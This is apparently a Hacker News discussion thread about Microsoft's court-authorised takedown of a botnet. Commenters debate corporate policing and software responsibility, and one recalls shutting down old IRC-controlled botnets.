
A botnet is taken down in an operation by Microsoft, not the government - wglb
https://www.nytimes.com/2020/03/10/us/politics/microsoft-botnets-malware.html
======
ipython
I'm glad this is getting coverage, but this is nothing new to Microsoft-
they've been doing this for almost a decade (see for example
[https://www.zeuslegalnotice.com/](https://www.zeuslegalnotice.com/)). DCU has
a great reputation and they're doing great work ( _in conjunction with_ law
enforcement and legal authorities) to make life better for all of us on the
Internet.

------
INTPenis
"Not the government" ooooh. As if AV vendors have been completely idle on that
front.

I just find this article very fitting as Microsoft is right now running an ad
campaign on reddit for their security services.

------
neonate
[https://archive.md/Mbiy0](https://archive.md/Mbiy0)

------
Frost1x
I remember when some of the earlier botnets I was exposed to used IRC networks
and private/hidden channels to provide command/control interfaces to the
bots/zombies/clients. In a lot of cases, the control mechanism had no
redundancy (set to one specific network and/or server and channel).

People passed around lots of executables during those days (naively trusting
sources/friends) which usually had additional side-loading mechanisms for the
bot (sometimes from an HTTP request, sometimes FTP).

Used to grab these modified executables for plugins/game extensions/etc,
sandbox them, and identify the control IRC networks, channels, passwords and
have the networks shutdown the channels which essentially killed the botnet
from further use.

I imagine most the clients are far more resilient and sophisticated these
days. I think the largest botnet I identified and 'shut down' (obviously with
help from IRC network admins) had around a million clients on separate
networks.

Most of these were pushed on smaller relatively unknown/unpopular IRC networks
where the admins somehow didn't notice tens of thousands of clients sitting
idle on their network.

It was always a bit enjoyable to pop in one of the private password protected
control channels and start a conversation, catching someone completely off
guard who didn't expect anyone to find their little control interface. I
imagine most these were built off a known library which wasn't too
sophisticated. Most people were humorously surprised.

------
ComputerGuru
This is the norm for Microsoft... it's the exception when governments lend
their help.

------
degenerate
The article was devoid of any technical details... what exactly were they
doing to "take down" the domains? Were the domains hosted on Azure? Were they
given permission by ICANN to modify the DNS? I want details!

~~~
bskap
I don't know about this one specifically, but in the past, they've taken
advantage of the fact that a lot of these scams claim to be Windows tech
support and the like. With a creative application of US trademark laws, which
allow manufacturers to seize counterfeit goods, they got a court order
allowing them to seize the domains and computers hosting the "counterfeit"
Microsoft websites.

------
scohesc
Makes sense that a company that provides an operating system for billions of
devices around the world takes some responsibility for any criminal actions
taken on others that use said operating systems' potential exploits/bugs to
harm other financially/personally/etc... Really cool to see an article written
about it though. Makes you think that Microsoft are the good guys :P

~~~
badrabbit
Regardless if size,companies are not law enforcers. MS is also not responisble
for the OS it has already sold to customers, that OS is not their property or
concern outside of patches (fixing what they broke before sales).

I hate this idea of corporate heroes,next thing they'll let them do offensive
operations (hack the hackers without any due process or authority).

~~~
jascii
Technically MS _does_ own the OS, the end user is just granted a license to
_use_ it. They do however not own the hardware it runs on, so there _should_
be limits on what they can do, I agree that the idea that they can act as law
enforcement without limits is chilling.

~~~
tomlogic
There are limits. The article describes them waiting on a federal court order
giving them authority to execute their plan.

~~~
kova12
I also understand that they control what amounts to a substantial private
police force. Which is exactly what government must do, not Microsoft

------
tus88
Haven't they been doing this for years?

------
ChrisArchitect
eight years in the making? six million domain names? (how does one even
address/disable/send requests to registrars for that many?) Big operation on
both ends. Yikes.

------
drcongo
The present tense of the headline is so weird. Is this an NYT thing?

~~~
statictype
I love that style of writing. Neal Stephenson used it in his earlier work to
great effect.

------
ptah
why is this surprising? because they are cleaning up a mess of their own
making instead of making taxpayers foot the bill?

~~~
IntelMiner
Exactly how is this Microsoft's fault?

~~~
ptah
they produce software that is vulnerable to exploitation by criminals

~~~
IntelMiner
Human beings write code that is imperfect because people are human beings

I don't think it's particularly fair to make it out like Microsoft
intentionally writes vulnerable software

~~~
ptah
i'm not saying they do it intentionally. i am saying that they should deal
with the consequences and not let taxpayers take the downside while they take
the upside

~~~
parheric
funny... so about those 1billion android devices that are no longer offered
security updates.

I guess Google should be taking responsibility there as well?

~~~
ptah
yes, exactly! you get it.

